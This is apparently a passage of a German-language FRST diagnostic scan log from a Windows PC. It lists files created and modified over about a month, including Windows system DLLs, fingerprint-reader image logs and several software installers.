2019-01-30 17:36 - 2019-01-30 17:36 - 000864056 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecurityHealthService.exe
2019-01-30 17:36 - 2019-01-30 17:36 - 000820736 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Core.TextInput.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 000800256 _____ (Microsoft Corporation) C:\WINDOWS\system32\uReFS.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 000770048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys
2019-01-30 17:36 - 2019-01-30 17:36 - 000744960 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 000741888 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 000726208 _____ (Microsoft Corporation) C:\WINDOWS\system32\kernel32.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 000700416 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Language.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 000684544 _____ (Microsoft Corporation) C:\WINDOWS\system32\vpnike.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 000604552 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiodg.exe
2019-01-30 17:36 - 2019-01-30 17:36 - 000588304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netio.sys
2019-01-30 17:36 - 2019-01-30 17:36 - 000556544 _____ (Microsoft Corporation) C:\WINDOWS\system32\BTAGService.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 000553984 _____ (Microsoft Corporation) C:\WINDOWS\system32\apphelp.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 000547840 _____ (Microsoft Corporation) C:\WINDOWS\system32\TileDataRepository.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 000543744 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2019-01-30 17:36 - 2019-01-30 17:36 - 000535048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
2019-01-30 17:36 - 2019-01-30 17:36 - 000527872 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2019-01-30 17:36 - 2019-01-30 17:36 - 000516608 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncsi.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 000496872 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsAdminFlows.exe
2019-01-30 17:36 - 2019-01-30 17:36 - 000494080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Graphics.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 000494080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Activities.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 000474936 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\FWPKCLNT.SYS
2019-01-30 17:36 - 2019-01-30 17:36 - 000433152 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorService.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 000430904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\Classpnp.sys
2019-01-30 17:36 - 2019-01-30 17:36 - 000420864 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsEnvironment.Desktop.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 000407552 _____ (Microsoft Corporation) C:\WINDOWS\system32\rascustom.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 000388096 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotificationUx.exe
2019-01-30 17:36 - 2019-01-30 17:36 - 000375544 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotifyIcon.exe
2019-01-30 17:36 - 2019-01-30 17:36 - 000365056 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationControllerPS.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 000346624 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 000326144 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Cortana.OneCore.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 000305664 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasppp.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 000262672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys
2019-01-30 17:36 - 2019-01-30 17:36 - 000251904 _____ (Microsoft Corporation) C:\WINDOWS\system32\HttpsDataSource.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 000184320 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasman.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 000171520 _____ (Microsoft Corporation) C:\WINDOWS\system32\DisplayManager.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 000165376 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompPkgSrv.exe
2019-01-30 17:36 - 2019-01-30 17:36 - 000160256 _____ (Microsoft Corporation) C:\WINDOWS\system32\spopk.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 000157192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pdc.sys
2019-01-30 17:36 - 2019-01-30 17:36 - 000148480 _____ C:\WINDOWS\system32\DataStoreCacheDumpTool.exe
2019-01-30 17:36 - 2019-01-30 17:36 - 000146888 _____ (Microsoft Corporation) C:\WINDOWS\system32\smss.exe
2019-01-30 17:36 - 2019-01-30 17:36 - 000143872 _____ (Microsoft Corporation) C:\WINDOWS\system32\musdialoghandlers.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 000140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.NetworkOperators.HotspotAuthentication.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 000121872 _____ (Microsoft Corporation) C:\WINDOWS\system32\kdnet.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 000119296 _____ (Microsoft Corporation) C:\WINDOWS\system32\setupcln.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 000114856 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompPkgSup.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 000097592 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dam.sys
2019-01-30 17:36 - 2019-01-30 17:36 - 000074424 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WindowsTrustedRT.sys
2019-01-30 17:36 - 2019-01-30 17:36 - 000062464 _____ (Microsoft Corporation) C:\WINDOWS\system32\umpo-overrides.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 000041984 _____ (Microsoft Corporation) C:\WINDOWS\system32\lpkinstall.exe
2019-01-30 17:35 - 2019-01-30 17:36 - 002766136 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpdateAgent.dll
2019-01-30 17:35 - 2019-01-30 17:35 - 004991096 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepository.dll
2019-01-30 17:35 - 2019-01-30 17:35 - 003556352 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2019-01-30 17:35 - 2019-01-30 17:35 - 002992640 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2019-01-30 17:35 - 2019-01-30 17:35 - 002721792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2019-01-30 17:35 - 2019-01-30 17:35 - 002466304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmSvc.dll
2019-01-30 17:35 - 2019-01-30 17:35 - 002149368 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinapi.appcore.dll
2019-01-30 17:35 - 2019-01-30 17:35 - 001255944 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2019-01-30 17:35 - 2019-01-30 17:35 - 001221120 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys
2019-01-30 17:35 - 2019-01-30 17:35 - 001209360 _____ (Microsoft Corporation) C:\WINDOWS\system32\drvstore.dll
2019-01-30 17:35 - 2019-01-30 17:35 - 001051152 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2019-01-30 17:35 - 2019-01-30 17:35 - 000970256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\drvstore.dll
2019-01-30 17:35 - 2019-01-30 17:35 - 000865784 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2019-01-30 17:35 - 2019-01-30 17:35 - 000850968 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll
2019-01-30 17:35 - 2019-01-30 17:35 - 000822448 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
2019-01-30 17:35 - 2019-01-30 17:35 - 000806560 _____ C:\WINDOWS\SysWOW64\locale.nls
2019-01-30 17:35 - 2019-01-30 17:35 - 000806560 _____ C:\WINDOWS\system32\locale.nls
2019-01-30 17:35 - 2019-01-30 17:35 - 000799568 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsapi.dll
2019-01-30 17:35 - 2019-01-30 17:35 - 000752136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vhdmp.sys
2019-01-30 17:35 - 2019-01-30 17:35 - 000651792 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\spaceport.sys
2019-01-30 17:35 - 2019-01-30 17:35 - 000651304 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
2019-01-30 17:35 - 2019-01-30 17:35 - 000648192 _____ (Microsoft Corporation) C:\WINDOWS\system32\w32time.dll
2019-01-30 17:35 - 2019-01-30 17:35 - 000629576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll
2019-01-30 17:35 - 2019-01-30 17:35 - 000612368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storport.sys
2019-01-30 17:35 - 2019-01-30 17:35 - 000580024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dnsapi.dll
2019-01-30 17:35 - 2019-01-30 17:35 - 000506408 _____ (Microsoft Corporation) C:\WINDOWS\system32\mf.dll
2019-01-30 17:35 - 2019-01-30 17:35 - 000408800 _____ (Microsoft Corporation) C:\WINDOWS\system32\mswsock.dll
2019-01-30 17:35 - 2019-01-30 17:35 - 000407040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Graphics.dll
2019-01-30 17:35 - 2019-01-30 17:35 - 000394752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AcLayers.dll
2019-01-30 17:35 - 2019-01-30 17:35 - 000353488 _____ (Microsoft Corporation) C:\WINDOWS\system32\wintrust.dll
2019-01-30 17:35 - 2019-01-30 17:35 - 000349184 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsrslvr.dll
2019-01-30 17:35 - 2019-01-30 17:35 - 000324408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mswsock.dll
2019-01-30 17:35 - 2019-01-30 17:35 - 000320000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32k.sys
2019-01-30 17:35 - 2019-01-30 17:35 - 000298296 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys
2019-01-30 17:35 - 2019-01-30 17:35 - 000276488 _____ (Microsoft Corporation) C:\WINDOWS\system32\MTF.dll
2019-01-30 17:35 - 2019-01-30 17:35 - 000273920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll
2019-01-30 17:35 - 2019-01-30 17:35 - 000217600 _____ (Microsoft Corporation) C:\WINDOWS\system32\container.dll
2019-01-30 17:35 - 2019-01-30 17:35 - 000203280 _____ (Microsoft Corporation) C:\WINDOWS\system32\tcbloader.dll
2019-01-30 17:35 - 2019-01-30 17:35 - 000202552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MTF.dll
2019-01-30 17:35 - 2019-01-30 17:35 - 000198144 _____ (Microsoft Corporation) C:\WINDOWS\system32\netiohlp.dll
2019-01-30 17:35 - 2019-01-30 17:35 - 000195896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\spacedump.sys
2019-01-30 17:35 - 2019-01-30 17:35 - 000195072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryUpgrade.dll
2019-01-30 17:35 - 2019-01-30 17:35 - 000193032 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys
2019-01-30 17:35 - 2019-01-30 17:35 - 000179712 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhosdeployment.dll
2019-01-30 17:35 - 2019-01-30 17:35 - 000165376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\spacebridge.dll
2019-01-30 17:35 - 2019-01-30 17:35 - 000155648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netiohlp.dll
2019-01-30 17:35 - 2019-01-30 17:35 - 000132104 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\stornvme.sys
2019-01-30 17:35 - 2019-01-30 17:35 - 000120320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthhfenum.sys
2019-01-30 17:35 - 2019-01-30 17:35 - 000090632 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.dll
2019-01-30 17:35 - 2019-01-30 17:35 - 000080400 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vpci.sys
2019-01-30 17:35 - 2019-01-30 17:35 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth8.bin
2019-01-30 17:35 - 2019-01-30 17:35 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth7.bin
2019-01-30 17:35 - 2019-01-30 17:35 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth6.bin
2019-01-30 17:35 - 2019-01-30 17:35 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth5.bin
2019-01-30 17:35 - 2019-01-30 17:35 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth4.bin
2019-01-30 17:35 - 2019-01-30 17:35 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth3.bin
2019-01-30 17:35 - 2019-01-30 17:35 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth2.bin
2019-01-30 17:35 - 2019-01-30 17:35 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth1.bin
2019-01-30 17:20 - 2019-01-30 17:20 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190130_172055.txt
2019-01-30 17:06 - 2019-01-30 17:06 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190130_170619.txt
2019-01-30 16:58 - 2019-01-30 16:58 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190130_165845.txt
2019-01-30 08:38 - 2019-01-30 08:38 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190130_083805.txt
2019-01-30 08:22 - 2019-01-30 08:22 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190130_082249.txt
2019-01-29 10:00 - 2017-09-29 19:35 - 000013113 _____ C:\Users\Fantacola\Desktop\manual.html
2019-01-29 10:00 - 2017-09-29 19:33 - 000040960 _____ () C:\Users\Fantacola\Desktop\memtest.exe
2019-01-29 09:54 - 2019-01-29 09:54 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190129_095422.txt
2019-01-29 09:41 - 2019-01-29 09:41 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190129_094105.txt
2019-01-29 09:17 - 2019-01-29 09:17 - 000117342 _____ C:\Users\Fantacola\Downloads\334e0fa91c8ddd1b1a8940e71a14d2ad.pdf
2019-01-29 09:12 - 2019-01-29 09:12 - 000305796 _____ C:\Users\Fantacola\Downloads\do-sterility-test-isolators-need-to-be-so-complicated-final-1.pdf
2019-01-29 09:12 - 2019-01-29 09:12 - 000205126 _____ C:\Users\Fantacola\Downloads\Sutton_The-Sterility-Tests.pdf
2019-01-29 09:11 - 2019-01-29 09:11 - 000163037 _____ C:\Users\Fantacola\Downloads\pi_012_3_recommendation_on_sterility_testing.pdf
2019-01-28 20:40 - 2019-01-28 20:40 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190128_204030.txt
2019-01-28 13:33 - 2019-01-28 13:33 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190128_133353.txt
2019-01-28 13:00 - 2019-01-28 13:00 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190128_130047.txt
2019-01-28 12:45 - 2019-01-28 12:45 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190128_124528.txt
2019-01-27 17:20 - 2019-01-27 17:20 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190127_172009.txt
2019-01-26 09:55 - 2019-01-26 09:55 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190126_095539.txt
2019-01-26 09:42 - 2019-01-26 09:42 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190126_094213.txt
2019-01-25 18:29 - 2019-01-25 18:29 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190125_182908.txt
2019-01-25 08:01 - 2019-01-25 08:01 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190125_080111.txt
2019-01-25 07:45 - 2019-01-25 07:45 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190125_074559.txt
2019-01-24 22:33 - 2019-01-24 22:33 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190124_223303.txt
2019-01-24 21:28 - 2019-01-24 21:28 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190124_212807.txt
2019-01-24 20:08 - 2019-01-24 20:08 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190124_200833.txt
2019-01-24 19:53 - 2019-01-24 19:53 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190124_195302.txt
2019-01-22 19:50 - 2019-01-22 19:50 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190122_195057.txt
2019-01-22 16:24 - 2019-01-22 16:24 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190122_162402.txt
2019-01-22 11:09 - 2019-01-22 11:09 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190122_110913.txt
2019-01-22 07:58 - 2019-01-22 07:58 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190122_075852.txt
2019-01-22 07:51 - 2019-01-22 07:51 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190122_075111.txt
2019-01-21 22:05 - 2019-01-21 22:05 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190121_220545.txt
2019-01-21 21:44 - 2019-01-21 21:44 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190121_214403.txt
2019-01-21 21:34 - 2019-02-11 21:05 - 000000000 ____D C:\WINDOWS\Minidump
2019-01-21 21:34 - 2019-01-21 21:34 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190121_213449.txt
2019-01-21 20:14 - 2019-01-21 20:14 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190121_201438.txt
2019-01-21 20:03 - 2019-01-21 20:03 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190121_200341.txt
2019-01-20 21:02 - 2019-01-20 21:02 - 000001367 _____ C:\Users\Fantacola\Desktop\Sidify Music Converter.lnk
2019-01-20 20:45 - 2019-01-20 21:01 - 000000000 ____D C:\Users\Fantacola\AppData\Roaming\MusicBrainz
2019-01-20 20:45 - 2019-01-20 20:45 - 000000000 ____D C:\Users\Fantacola\AppData\Local\MusicBrainz
2019-01-20 20:44 - 2019-01-20 20:44 - 000001001 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MusicBrainz Picard.lnk
2019-01-20 20:44 - 2019-01-20 20:44 - 000000000 ____D C:\Program Files\MusicBrainz Picard
2019-01-20 18:10 - 2019-01-20 18:10 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190120_181053.txt
2019-01-20 17:24 - 2019-01-20 17:24 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190120_172428.txt
2019-01-20 17:22 - 2019-01-20 20:44 - 027888700 _____ (MusicBrainz) C:\Users\Fantacola\Downloads\picard-setup-2.1.exe
2019-01-20 17:14 - 2019-01-20 17:14 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190120_171437.txt
2019-01-20 17:02 - 2019-01-20 17:02 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190120_170259.txt
2019-01-20 15:43 - 2019-01-20 15:43 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190120_154309.txt
2019-01-20 15:34 - 2019-01-20 15:34 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190120_153417.txt
2019-01-19 20:37 - 2019-01-19 20:37 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190119_203735.txt
2019-01-19 20:29 - 2019-01-19 20:29 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190119_202922.txt
2019-01-19 18:11 - 2019-01-19 18:11 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190119_181158.txt
2019-01-19 15:54 - 2019-01-19 15:54 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190119_155423.txt
2019-01-19 13:02 - 2019-01-19 13:02 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190119_130232.txt
2019-01-18 20:56 - 2019-01-18 20:56 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190118_205615.txt
2019-01-18 17:01 - 2019-01-18 17:01 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190118_170124.txt
2019-01-18 13:55 - 2019-01-18 13:55 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190118_135538.txt
2019-01-18 13:12 - 2019-01-18 19:34 - 000000000 ____D C:\Users\Fantacola\Downloads\Tiptoi
2019-01-18 12:40 - 2019-01-18 12:40 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190118_124056.txt
2019-01-18 10:23 - 2019-01-18 10:23 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190118_102304.txt
2019-01-18 08:08 - 2019-01-18 08:08 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190118_080846.txt
2019-01-18 07:53 - 2019-01-18 07:53 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190118_075300.txt
2019-01-17 20:07 - 2019-01-17 20:07 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190117_200747.txt
2019-01-17 19:53 - 2019-01-17 19:53 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190117_195355.txt
2019-01-17 19:45 - 2019-01-17 19:45 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190117_194543.txt
2019-01-16 20:32 - 2019-01-16 20:32 - 000391761 _____ C:\Users\Fantacola\Desktop\DI Plan Reporting Guide.xlsx
2019-01-16 15:54 - 2019-01-16 15:54 - 062928040 _____ (Skype Technologies S.A.) C:\Users\Fantacola\Downloads\Skype-8.34.0.78.exe
2019-01-16 15:44 - 2019-01-16 15:44 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190116_154418.txt
2019-01-16 07:52 - 2019-01-16 07:52 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190116_075225.txt
2019-01-16 07:48 - 2019-01-16 07:48 - 003298344 _____ (Dominik Reichl ) C:\Users\Fantacola\Downloads\KeePass-2.41-Setup.exe
2019-01-16 07:44 - 2019-01-16 07:44 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190116_074410.txt
2019-01-15 16:55 - 2019-01-18 13:02 - 000000949 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\tiptoi® Manager.lnk
2019-01-15 16:55 - 2019-01-18 13:02 - 000000937 _____ C:\Users\Public\Desktop\tiptoi® Manager.lnk
2019-01-15 16:55 - 2019-01-18 13:02 - 000000000 ____D C:\Program Files\tiptoi® Manager
2019-01-15 16:35 - 2019-01-15 16:35 - 000000849 _____ C:\Users\Fantacola\Desktop\WizTree.lnk
2019-01-15 16:35 - 2019-01-15 16:35 - 000000000 ____D C:\Users\Fantacola\AppData\Roaming\WizTree3
2019-01-15 16:35 - 2019-01-15 16:35 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WizTree
2019-01-15 16:35 - 2019-01-15 16:35 - 000000000 ____D C:\Program Files\WizTree
2019-01-15 16:34 - 2019-01-15 16:34 - 003542904 _____ (Antibody Software ) C:\Users\Fantacola\Downloads\wiztree_3_26_1_setup.exe
2019-01-15 16:22 - 2019-01-15 17:28 - 000001289 _____ C:\Users\Fantacola\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\PhraseExpress.lnk
2019-01-15 16:20 - 2019-02-10 22:54 - 000000000 ____D C:\Users\Fantacola\Documents\PhraseExpress
2019-01-15 16:17 - 2019-01-15 16:17 - 019214008 _____ (Bartels Media GmbH ) C:\Users\Fantacola\Downloads\phraseexpresssetup.exe
2019-01-15 16:01 - 2019-01-15 16:01 - 000000000 ____D C:\WINDOWS\System32\Tasks\Avast Software
2019-01-15 16:00 - 2019-01-15 16:00 - 000000000 ____D C:\Program Files\Common Files\AVAST Software
2019-01-15 15:58 - 2019-01-15 16:00 - 000000000 ____D C:\ProgramData\AVAST Software
2019-01-15 15:01 - 2019-01-15 15:01 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190115_150144.txt
2019-01-15 14:49 - 2019-01-15 14:49 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190115_144921.txt
2019-01-15 11:37 - 2019-01-15 11:37 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190115_113737.txt
2019-01-15 07:54 - 2019-01-15 07:54 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190115_075402.txt
2019-01-15 07:45 - 2019-01-15 07:45 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190115_074523.txt
2019-01-13 22:01 - 2019-01-13 22:01 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190113_220140.txt
2019-01-13 20:18 - 2019-01-13 20:18 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190113_201837.txt
2019-01-13 20:03 - 2019-01-13 20:03 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190113_200314.txt
2019-01-13 13:01 - 2019-01-13 13:01 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190113_130153.txt
2019-01-13 12:45 - 2019-01-13 12:45 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190113_124508.txt

==================== Ein Monat (geänderte) ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2019-02-12 08:04 - 2018-04-02 18:26 - 000000000 ____D C:\Users\Fantacola\AppData\LocalLow\Mozilla
2019-02-12 07:48 - 2018-04-02 17:59 - 000065536 _____ C:\WINDOWS\system32\spu_storage.bin
2019-02-12 07:47 - 2018-09-15 08:31 - 000000000 ____D C:\WINDOWS\INF
2019-02-12 07:47 - 2018-04-02 18:04 - 000000000 ____D C:\WINDOWS\SysWOW64\RTCOM
2019-02-12 07:46 - 2018-09-15 08:33 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2019-02-12 07:44 - 2018-12-18 18:05 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2019-02-12 07:44 - 2018-04-28 12:50 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2019-02-12 07:43 - 2018-09-15 07:09 - 001310720 _____ C:\WINDOWS\system32\config\BBI
2019-02-12 07:42 - 2018-12-17 23:02 - 000000000 ___HD C:\Program Files (x86)\Temp
2019-02-12 07:41 - 2018-12-18 17:41 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2019-02-11 23:26 - 2018-09-15 08:33 - 000000000 ____D C:\WINDOWS\LiveKernelReports
2019-02-11 23:25 - 2018-06-22 08:41 - 000000000 ____D C:\Users\Fantacola\AppData\Roaming\KeePass
2019-02-11 23:02 - 2018-04-02 18:11 - 000000000 ____D C:\Program Files (x86)\Microsoft Office
2019-02-11 22:39 - 2018-12-18 17:58 - 001739732 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2019-02-11 22:39 - 2018-09-15 18:33 - 000748728 _____ C:\WINDOWS\system32\perfh007.dat
2019-02-11 22:39 - 2018-09-15 18:33 - 000153234 _____ C:\WINDOWS\system32\perfc007.dat
2019-02-11 22:38 - 2018-12-11 21:47 - 000019710 _____ C:\Users\Fantacola\Downloads\keypass_fantacola.kdbx
2019-02-11 22:34 - 2018-06-11 07:21 - 000000000 ____D C:\Program Files\Malwarebytes
2019-02-11 22:33 - 2018-12-18 17:41 - 000457680 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2019-02-11 22:31 - 2018-12-17 23:10 - 000000000 ____D C:\Program Files (x86)\Intel
2019-02-11 22:31 - 2018-12-17 23:05 - 000000000 ____D C:\Program Files\Intel
2019-02-11 22:30 - 2018-12-17 23:02 - 000000000 ____D C:\Program Files (x86)\Realtek
2019-02-11 22:28 - 2018-04-02 18:01 - 000000000 ____D C:\ProgramData\Package Cache
2019-02-11 22:26 - 2018-12-17 23:09 - 000000000 ____D C:\ProgramData\Intel
2019-02-11 22:23 - 2018-06-14 16:49 - 000000000 ____D C:\Users\Fantacola\AppData\Local\D3DSCache
